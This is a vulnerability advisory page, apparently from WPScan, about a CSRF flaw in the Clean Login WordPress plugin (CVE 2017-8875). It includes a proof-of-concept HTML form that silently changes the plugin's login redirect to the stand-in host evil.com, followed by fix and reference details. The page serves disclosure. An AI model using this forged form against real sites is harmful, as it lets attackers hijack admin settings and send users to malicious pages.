Clean Login <= 1.7.12 - Change Redirect URL CSRF

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings";>

  <input type="text" name= "adminbar" value=“on">

 <input type="text" name="emailnotificationcontent" value="">
 <input type="text" name="termsconditionsMSG" value="">
 <input type="text" name="termsconditionsURL" value="">
 <input type="text" name="urlredirect" value=“http://127.0.0.1/wordpress”>
 <input type=“text” name="loginredirect” value=“on”>
 <input type=“text” name="loginredirect_url” value="http://evil.com”>
 <input type=“text” name="logoutredirect_url” value="http://127.0.0.1/wordpress”>
 <input type=“text” name="cl_hidden_field” value="hidden_field_to_update_others”>
 <input type=“text” name="Submit” value="Save Changes”>
   <input type="submit”>

</form>

Affects Plugin

fixed in version 1.8

References

CVE 2017-8875
URL http://seclists.org/fulldisclosure/2017/May/23

Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 141
Verified No
WPVDB ID 8808

Timeline

Publicly Published 2017-05-05 (5 months ago)
Added 2017-05-11 (4 months ago)
Last Updated 2017-05-11 (4 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.